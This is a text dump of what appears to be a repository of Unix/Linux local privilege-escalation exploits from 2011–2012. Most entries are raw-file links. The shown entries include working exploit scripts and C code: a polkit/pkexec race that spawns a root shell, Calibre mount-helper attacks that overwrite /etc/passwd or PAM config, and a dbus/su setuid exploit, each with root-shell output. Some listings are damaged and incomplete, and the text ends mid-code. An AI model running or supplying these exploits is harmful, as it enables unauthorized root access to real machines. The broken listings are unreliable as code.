 *   CVE-2010-4165 fix; presumably that fix raises the minimum MSS accepted by
 *   TCP_MAXSEG -- confirm against the upstream change before relying on it.
 *
 *   Listing damage: the header names after each #include were stripped when
 *   this page was generated, so the file does not build as shown.
 */
13 |
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 |
21 | int main()
22 | {
23 | struct sockaddr_in laddr;
24 | memset(&laddr, 0, sizeof(laddr));
25 | laddr.sin_family = AF_INET;
26 | laddr.sin_addr.s_addr = inet_addr("127.0.0.1");
27 | laddr.sin_port = htons(31337); /* fixed loopback port; bind() below fails if something else already holds it */
28 | int listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
29 | if (listener < 0) {
30 | printf("[-] Could not open listener.\n");
31 | return -1; /* every failure path returns -1, i.e. exit status 255 */
32 | }
33 | int val = 12; /* an MSS this small is what the vulnerable kernel mishandles (see header); presumably fixed kernels reject or clamp it -- confirm */
34 | if (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) {
35 | printf("[-] Could not set sockopt.\n");
36 | return -1;
37 | }
38 | if (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { /* sizeof(struct sockaddr) equals sizeof(laddr) for AF_INET (16 bytes), so this is harmless */
39 | printf("[-] Could not bind to address.\n");
40 | return -1;
41 | }
42 | if (listen(listener, 1) < 0) {
43 | printf("[-] Could not listen.\n");
44 | return -1;
45 | }
46 | int hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); /* second socket in the same process; neither socket is closed explicitly, process exit releases both */
47 | if (hello < 0) {
48 | printf("[-] Could not open connector.\n");
49 | return -1;
50 | }
51 | if (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) {
52 | printf("[-] Could not connect to listener.\n");
53 | return -1;
54 | }
55 | printf("[-] Connection did not trigger oops.\n"); /* reaching here means the kernel survived the connection; the header treats that as the not-vulnerable outcome */
56 | return 0;
57 | }
--------------------------------------------------------------------------------
/2011/6.4-2011:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/6.4-2011
--------------------------------------------------------------------------------
/2011/CVE-2011-1485/CVE-2011-1485.sh:
--------------------------------------------------------------------------------
1 | # modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh
2 | # for rdot.org
3 | cat > suid.c << _EOF
4 | #include
5 | #include
6 | main(int argc, char *argv[])
7 | {
8 | if(argc == 2) {
9 | setgid(0); setuid(0);
10 | system(argv[1]); }
11 | return 0;
12 | }
13 | _EOF
14 | cat > makesuid.c << _EOF
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | int main(int argc, char **argv)
21 | {
22 | if (fork() != 0)
23 | {
24 | int fd;
25 | char pid_path[15];
26 | sprintf(pid_path, "/proc/%i", getpid());
27 | close(0); close(1); close(2);
28 | fd = inotify_init();
29 | inotify_add_watch(fd, pid_path, IN_ACCESS);
30 | read(fd, NULL, 0);
31 | execl("/usr/bin/passwd", "/usr/bin/passwd", NULL);
32 | }
33 | else
34 | {
35 | execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL);
36 | }
37 |
38 | return 0;
39 | }
40 |
41 | _EOF
42 | gcc -o suid suid.c
43 | gcc -o makesuid makesuid.c
44 | ./makesuid chown root:root $PWD/suid
45 | ./makesuid chmod u+s $PWD/suid
46 | echo "your suid is on ./suid make sure u move this !!!"
47 | rm suid.c makesuid.c makesuid 48 | $PWD/suid -c /usr/bin/id -------------------------------------------------------------------------------- /2011/CVE-2011-1485/polkit-pwnage.c: -------------------------------------------------------------------------------- 1 | /* polkit-pwnage.c 2 | * 3 | * 4 | * ============================== 5 | * = PolicyKit Pwnage = 6 | * = by zx2c4 = 7 | * = Sept 2, 2011 = 8 | * ============================== 9 | * 10 | * 11 | * Howdy folks, 12 | * 13 | * This exploits CVE-2011-1485, a race condition in PolicyKit. 14 | * 15 | * davidz25 explains: 16 | * 17 | * --begin-- 18 | * Briefly, the problem is that the UID for the parent process of pkexec(1) is 19 | * read from /proc by stat(2)'ing /proc/PID. The problem with this is that 20 | * this returns the effective uid of the process which can easily be set to 0 21 | * by invoking a setuid-root binary such as /usr/bin/chsh in the parent 22 | * process of pkexec(1). Instead we are really interested in the real-user-id. 23 | * While there's a check in pkexec.c to avoid this problem (by comparing it to 24 | * what we expect the uid to be - namely that of the pkexec.c process itself which 25 | * is the uid of the parent process at pkexec-spawn-time), there is still a short 26 | * window where an attacker can fool pkexec/polkitd into thinking that the parent 27 | * process has uid 0 and is therefore authorized. It's pretty hard to hit this 28 | * window - I actually don't know if it can be made to work in practice. 29 | * --end-- 30 | * 31 | * Well, here is, in fact, how it's made to work in practice. There is as he said an 32 | * attempted mitigation, and the way to trigger that mitigation path is something 33 | * like this: 34 | * 35 | * $ sudo -u `whoami` pkexec sh 36 | * User of caller (0) does not match our uid (1000) 37 | * 38 | * Not what we want. So the trick is to execl to a suid at just the precise moment 39 | * /proc/PID is being stat(2)'d. 
We use inotify to learn exactly when it's accessed, 40 | * and execl to the suid binary as our very next instruction. 41 | * 42 | * ** Usage ** 43 | * $ pkexec --version 44 | * pkexec version 0.101 45 | * $ gcc polkit-pwnage.c -o pwnit 46 | * $ ./pwnit 47 | * [+] Configuring inotify for proper pid. 48 | * [+] Launching pkexec. 49 | * sh-4.2# whoami 50 | * root 51 | * sh-4.2# id 52 | * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm) 53 | * sh-4.2# 54 | * 55 | * ** Targets ** 56 | * This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which 57 | * as of writing uses 0.101, has backported 0.102's bug fix. A way to check 58 | * this is by looking at the mtime of /usr/bin/pkexec -- April 19, 2011 or 59 | * later and you're out of luck. It's likely other distributions do the same. 60 | * Fortunately, this exploit is clean enough that you can try it out without 61 | * too much collateral. 62 | * 63 | * 64 | * greets to djrbliss and davidz25. 65 | * 66 | * - zx2c4 67 | * 2-sept-2011 68 | * 69 | */ 70 | 71 | 72 | #include 73 | #include 74 | #include 75 | #include 76 | #include 77 | #include 78 | 79 | int main(int argc, char **argv) 80 | { 81 | printf("=============================\n"); 82 | printf("= PolicyKit Pwnage =\n"); 83 | printf("= by zx2c4 =\n"); 84 | printf("= Sept 2, 2011 =\n"); 85 | printf("=============================\n\n"); 86 | 87 | if (fork()) { 88 | int fd; 89 | char pid_path[1024]; 90 | sprintf(pid_path, "/proc/%i", getpid()); 91 | printf("[+] Configuring inotify for proper pid.\n"); 92 | close(0); close(1); close(2); 93 | fd = inotify_init(); 94 | if (fd < 0) 95 | perror("[-] inotify_init"); 96 | inotify_add_watch(fd, pid_path, IN_ACCESS); 97 | read(fd, NULL, 0); 98 | execl("/usr/bin/chsh", "chsh", NULL); 99 | } else { 100 | sleep(1); 101 | printf("[+] Launching pkexec.\n"); 102 | execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL); 103 | } 104 | return 0; 105 | } 106 | 
-------------------------------------------------------------------------------- /2011/CVE-2011-4124/cali.sh: -------------------------------------------------------------------------------- 1 | # Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root 2 | # Date: Nov 2, 2011 3 | # Author: zx2c4 4 | # Software Link: http://calibre-ebook.com/ 5 | # Tested on: Gentoo 6 | # Platform: Linux 7 | # Category: Local 8 | # CVE: pending 9 | #!/bin/sh 10 | 11 | ####################################### 12 | # .60-Calibrer Assault Mount # 13 | # by zx2c4 # 14 | ####################################### 15 | 16 | ################################################################################ 17 | # Yesterday we learned how Calibre's usage of execlp allowed us to override PATH 18 | # and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a 19 | # more fundumental issue with Calibre's mount helper -- namely, that it allows 20 | # us to mount a vfat filesystem anywhere we want. By mounting a file system 21 | # image over /etc, we are able to tinker /etc/passwd and make the root password 22 | # temporarily "toor". 23 | # 24 | # - zx2c4 25 | # 2011-11-2 26 | # 27 | # Usage: 28 | # $ ./60calibrerassaultmount.sh 29 | # [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4 30 | # [+] Making overlay image: 31 | # 51200+0 records in 32 | # 51200+0 records out 33 | # 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s 34 | # mkfs.vfat 3.0.11 (24 Dec 2010) 35 | # [+] Mounting overlay image using calibre-mount-helper. 36 | # [+] Copying /etc into overlay. 37 | # [+] Tampering with overlay's passwd. 38 | # [+] Unmounting overlay image using calibre-mount-helper. 39 | # [+] Mounting overlay to /etc using calibre-mount-helper. 40 | # [+] Asking for root. When prompted for a password, enter 'toor'. 41 | # Password: [typed in toor to the terminal] 42 | # [+] Unmounting /etc using root umount. 
43 | # [+] Cleaning up: /tmp/tmp.OGgS0jaoD4 44 | # [+] Getting shell. 45 | # sh-4.2# id 46 | # uid=0(root) gid=0(root) groups=0(root) 47 | # sh-4.2# whoami 48 | # root 49 | # sh-4.2# 50 | ################################################################################ 51 | 52 | 53 | echo "#######################################" 54 | echo "# .60-Calibrer Assault Mount #" 55 | echo "# by zx2c4 #" 56 | echo "#######################################" 57 | echo 58 | echo -n "[+] Making temporary directory: " 59 | dir="$(mktemp -d)" 60 | echo "$dir" 61 | cd "$dir" 62 | echo "[+] Making overlay image:" 63 | dd if=/dev/zero of=overlay count=51200 64 | /usr/sbin/mkfs.vfat overlay 65 | echo "[+] Mounting overlay image using calibre-mount-helper." 66 | mkdir staging 67 | calibre-mount-helper mount overlay staging 68 | echo "[+] Copying /etc into overlay." 69 | cd staging/ 70 | cp -a /etc/* . 2>/dev/null 71 | echo "[+] Tampering with overlay's passwd." 72 | cat passwd | tail -n +2 > tmp 73 | echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp 74 | mv tmp passwd 75 | echo "[+] Unmounting overlay image using calibre-mount-helper." 76 | cd .. 77 | calibre-mount-helper eject overlay staging >/dev/null 2>&1 78 | echo "[+] Mounting overlay to /etc using calibre-mount-helper." 79 | calibre-mount-helper mount overlay /etc >/dev/null 2>&1 80 | cd / 81 | echo "[+] Asking for root. When prompted for a password, enter 'toor'." 
82 | su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; 83 | HISTFILE=\"/dev/null\" exec /bin/sh" 84 | -------------------------------------------------------------------------------- /2011/CVE-2011-4124/calib.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ########################################### 4 | # .70-Calibrer Assault Mount # 5 | # by Dan Rosenberg (@djrbliss) and zx2c4 # 6 | ########################################### 7 | 8 | ################################################################################ 9 | # Yesterday we learned how Calibre's ability to mount anything anywhere resulted 10 | # in a local root. Today's exploit shows a race condition to subvert recent 11 | # changes preventing symlinks and checking path prefixes. 12 | # 13 | # - djrbliss & zx2c4 14 | # 2011-11-3 15 | ################################################################################ 16 | 17 | 18 | overlay=/dev/shm/overlay 19 | staging=/media/staging 20 | mounter=calibre-mount-helper 21 | fakemount=/media/staging/fake 22 | target=/etc/pam.d 23 | mkfsntfs=/sbin/mkfs.ntfs 24 | 25 | echo "[+] Making overlay image:" 26 | dd if=/dev/zero of=$overlay count=51200 27 | $mkfsntfs -F $overlay 28 | 29 | echo "[+] Mounting overlay image using calibre-mount-helper." 30 | $mounter mount $overlay $staging 31 | 32 | echo "[+] Copying /etc/pam.d/ into overlay." 33 | cp /etc/pam.d/* $staging/ 2>/dev/null 34 | 35 | sed -i "s/pam_deny.so/pam_permit.so/g" $staging/common-auth 36 | 37 | echo "[*] Making fake mountpoint." 38 | rm -rf $fakemount 2>/dev/null 39 | 40 | echo "[*] Preparing binary payload..." 
41 | 42 | cat > /tmp/pwn.c << _EOF 43 | #include 44 | #include 45 | #include 46 | 47 | int main(int argc, char **argv) 48 | { 49 | 50 | int fd, wd, ret; 51 | 52 | if (fork()) { 53 | fd = inotify_init(); 54 | 55 | unlink("$fakemount"); 56 | mkdir("$fakemount"); 57 | 58 | wd = inotify_add_watch(fd, "$fakemount", IN_CREATE); 59 | read(fd, 0, 0); 60 | 61 | rename("$fakemount", "$staging/tmp"); 62 | symlink("$target", "$fakemount"); 63 | rmdir("$staging/tmp"); 64 | 65 | return 0; 66 | 67 | } else { 68 | sleep(1); 69 | return system("$mounter mount $overlay $fakemount"); 70 | } 71 | return 0; 72 | } 73 | _EOF 74 | 75 | gcc /tmp/pwn.c -o /tmp/pwn 76 | ret=1 77 | while [ $ret -ne 0 ]; do 78 | /tmp/pwn 79 | ret=$? 80 | done; 81 | 82 | sleep 2 83 | 84 | echo "[+] Asking for root. When prompted for a password, type anything and press enter." 85 | su -c "echo \"[+] Cleaning up.\"; umount $fakemount; umount $staging; rm -rf $overlay; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh" 86 | -------------------------------------------------------------------------------- /2011/CVE-2011-4124/shadow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/CVE-2011-4124/shadow -------------------------------------------------------------------------------- /2011/CVE-2012-0809/death-star: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/CVE-2012-0809/death-star -------------------------------------------------------------------------------- /2011/z1d-2011: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/z1d-2011 -------------------------------------------------------------------------------- /2012/0977: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/0977 -------------------------------------------------------------------------------- /2012/10: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/10 -------------------------------------------------------------------------------- /2012/11: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/11 -------------------------------------------------------------------------------- /2012/13x: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/13x -------------------------------------------------------------------------------- /2012/14: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/14 -------------------------------------------------------------------------------- /2012/15150: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/15150 
-------------------------------------------------------------------------------- /2012/15200: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/15200 -------------------------------------------------------------------------------- /2012/16-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/16-1 -------------------------------------------------------------------------------- /2012/18: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/18 -------------------------------------------------------------------------------- /2012/18-5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/18-5 -------------------------------------------------------------------------------- /2012/2-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2-1 -------------------------------------------------------------------------------- /2012/2-6-37: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2-6-37 -------------------------------------------------------------------------------- /2012/2.6.17_2.6.24: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.17_2.6.24
--------------------------------------------------------------------------------
/2012/2.6.18-2.6.24-2.6.20-2.6.22-2.6.21.c:
--------------------------------------------------------------------------------
/*
 * Reviewer notes on this listing (added):
 *
 *   This copy is damaged, not merely unformatted. It opens with a stray
 *   comment terminator (line 1) whose opening half -- presumably the original
 *   description and credits -- is gone; the opening braces of own_child()
 *   (after line 10) and main() (after line 118) and the closing braces of
 *   own_child() (around line 71), own() (around line 117) and main() are all
 *   missing, although other braces survived. It does not compile as shown and
 *   should be treated as a reference fragment only. The header names after
 *   each #include were also stripped when the page was generated.
 *
 *   What the surviving code does: own() creates a UNIX-domain socketpair once
 *   and forks own_child(). The child loops forever; on each pass it creates a
 *   fresh socketpair, sends one end of it over the current socket as an
 *   SCM_RIGHTS descriptor, closes what it just sent, and continues from the
 *   other end -- a chain of descriptors passed in flight between sockets.
 *   own() receives a single such message, swaps its receiving end for the
 *   descriptor it was handed, and main() exits. Nothing visible here changes
 *   privilege; whatever the chain was meant to trigger is in the missing
 *   part, so do not infer a target from the kernel versions in the file name.
 */
1 | */
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 | static int own_child(int *us) /* us[] is the socketpair made in own(): the parent keeps us[0] (it closes us[1] on line 26), the child keeps us[1] (line 31); opening brace missing in this listing */
11 |
12 | int pid;
13 | int s[2];
14 | struct msghdr mh;
15 | char crap[1024];
16 | struct iovec iov;
17 | struct cmsghdr *c;
18 | int *fd;
19 | int rc;
20 |
21 | pid = fork();
22 | if (pid == -1)
23 | err(1, "fork()");
24 |
25 | if (pid) {
26 | close(us[1]);
27 |
28 | return pid; /* parent: hand the child's pid back to own() */
29 | }
30 |
31 | close(us[0]);
32 |
33 | memset(&mh, 0, sizeof(mh));
34 | iov.iov_base = "a"; /* one-byte payload; the descriptor itself travels in the SCM_RIGHTS control message built below (string literal into a non-const void * -- a warning, not a bug) */
35 | iov.iov_len = 1;
36 |
37 | mh.msg_iov = &iov;
38 | mh.msg_iovlen = 1;
39 | mh.msg_control = crap;
40 | mh.msg_controllen = sizeof(crap);
41 |
42 | c = CMSG_FIRSTHDR(&mh);
43 | assert(c); /* every sanity check on the control message in this file is an assert() and disappears under -DNDEBUG */
44 |
45 | c->cmsg_level = SOL_SOCKET;
46 | c->cmsg_type = SCM_RIGHTS;
47 |
48 | fd = (int*) CMSG_DATA(c); /* fd points into crap[]; the loop below rewrites the single int it carries each pass */
49 | assert(fd);
50 |
51 | c->cmsg_len = CMSG_LEN(sizeof(int));
52 | mh.msg_controllen = c->cmsg_len;
53 |
54 | while (1) { /* never exits on its own: each pass makes a new socketpair, passes s[0] over the current sending end, then moves on to s[1] */
55 | if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1)
56 | err(1, "socketpair()");
57 |
58 | *fd = s[0];
59 |
60 | rc = sendmsg(us[1], &mh, 0);
61 | if (rc == -1)
62 | err(1, "sendmsg()");
63 |
64 | if (rc != iov.iov_len) /* int compared with size_t; a compiler warning only, since rc == -1 was handled above */
65 | errx(1, "sent short");
66 |
67 | close(s[0]);
68 | close(us[1]);
69 | us[1] = s[1]; /* the other end of the pair just sent becomes the next hop's sending end */
70 | }
71 |
72 |
73 | static void own(void)
74 | {
75 | static int pid; /* static so a repeat call would reuse the child instead of forking again; main() below calls own() only once anyway */
76 | static int us[2];
77 | char crap[1024];
78 | char morte[1024];
79 | struct cmsghdr *c;
80 | int rc;
81 | struct msghdr mh;
82 | struct iovec iov;
83 | int *fds;
84 |
85 | if (!pid) {
86 | if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1)
87 | err(1, "socketpair()");
88 | pid = own_child(us);
89 | }
90 |
91 | iov.iov_base = morte;
92 | iov.iov_len = sizeof(morte);
93 |
94 | memset(&mh, 0, sizeof(mh));
95 | mh.msg_iov = &iov;
96 | mh.msg_iovlen = 1;
97 | mh.msg_control = crap;
98 | mh.msg_controllen = sizeof(crap);
99 |
100 | rc = recvmsg(us[0], &mh, 0);
101 | if (rc == -1)
102 | err(1, "recvmsg()");
103 |
104 | if (rc == 0) /* EOF can only mean the child is gone, since its loop on line 54 never returns */
105 | errx(1, "EOF");
106 |
107 | c = CMSG_FIRSTHDR(&mh);
108 | assert(c);
109 | assert(c->cmsg_type == SCM_RIGHTS);
110 |
111 | fds = (int*) CMSG_DATA(c);
112 | assert(fds);
113 |
114 | close(us[0]);
115 | us[0] = *fds; /* from here on the parent reads from the descriptor it was just passed; its original end was closed on line 114 */
116 |
117 |
118 | int main(int argc, char *argv[]) /* opening and closing braces missing in this listing */
119 |
120 | own();
121 | exit(0);
--------------------------------------------------------------------------------
/2012/2.6.18-374.12.1.el5-2012:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.18-374.12.1.el5-2012
--------------------------------------------------------------------------------
/2012/2.6.32.279..2012.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.32.279..2012.out
--------------------------------------------------------------------------------
/2012/2.6.33:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.33
--------------------------------------------------------------------------------
/2012/2.6.37:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.37 -------------------------------------------------------------------------------- /2012/2.6.37-rc2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.37-rc2 -------------------------------------------------------------------------------- /2012/2.6.39 and up/mempodipper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/2.6.39 and up/mempodipper -------------------------------------------------------------------------------- /2012/3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/3 -------------------------------------------------------------------------------- /2012/31: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/31 -------------------------------------------------------------------------------- /2012/36-rc1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/36-rc1 -------------------------------------------------------------------------------- /2012/4: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/4 -------------------------------------------------------------------------------- /2012/44: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/44 -------------------------------------------------------------------------------- /2012/5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/5 -------------------------------------------------------------------------------- /2012/7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/7 -------------------------------------------------------------------------------- /2012/7-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/7-2 -------------------------------------------------------------------------------- /2012/7x: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/7x -------------------------------------------------------------------------------- /2012/8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/8 
-------------------------------------------------------------------------------- /2012/89: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/89 -------------------------------------------------------------------------------- /2012/9: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/9 -------------------------------------------------------------------------------- /2012/99: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/99 -------------------------------------------------------------------------------- /2012/CVE-2012-0946/CVE-2012-0946: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/CVE-2012-0946/CVE-2012-0946 -------------------------------------------------------------------------------- /2012/CVE-2012-3524/dd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2012/CVE-2012-3524/dd -------------------------------------------------------------------------------- /2012/CVE-2012-3524/dd.c: -------------------------------------------------------------------------------- 1 | /* CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer 2 | * 3 | * edited by Pashkela for RDOT.ORG (23.01.2013) 4 | * 5 | * su auto vector (need tty + current user password) 6 | * 7 | * Trivial non-dbus root 
exploit. (Yes, it is 2012!) 8 | * 9 | * The underlying bug (insecure getenv() by default) has been 10 | * reported ages ago, but nobody really cared. Unless you have an 11 | * exploit... 12 | * ============================================================== 13 | * Ubuntu 9.04 14 | * 15 | * an@an-desktop:~$ uname -a 16 | * Linux an-desktop 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux 17 | * an@an-desktop:~$ gcc s.c -o s 18 | * an@an-desktop:~$ id 19 | * uid=1000(an) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an) 20 | * an@an-desktop:~$ ./s 21 | * [**] CVE-2012-3524 xSports -- this is not a dbus exploit! 22 | * 23 | *[*] Preparing ... 24 | *[+] Type current user passwd when asked 25 | *[*] Waiting 10s for dbus-launch to drop boomshell. 26 | * Password: ....... 27 | * bash: [+] GOT root!: No such file or directory 28 | * ... 29 | * [!] Hurra! 30 | * bash-3.2# id 31 | * uid=0(root) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an) 32 | * bash-3.2# 33 | * ============================================================== 34 | */ 35 | 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | 46 | 47 | int main(int argc, char **argv) 48 | { 49 | int i = 0; 50 | struct stat st; 51 | pid_t pid = 0; 52 | char *env[] = { 53 | "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin", 54 | "DBUS_STARTER_BUS_TYPE=system", 55 | "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:", 56 | NULL, 57 | NULL 58 | }; 59 | 60 | 61 | char *su[] = {"/bin/su",NULL,"[+] GOT root!", NULL}; 62 | 63 | char **a = su; 64 | char *dbus[] = {"/tmp/dbus-launch", NULL}; 65 | char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL}; 66 | char me[0x1000]; 67 | 68 | if (geteuid() == 0 && argc > 1) { 69 | chown("/tmp/dbus-launch", 0, 0); 70 | chmod("/tmp/dbus-launch", 04755); 71 | exit(errno); 72 | } else if 
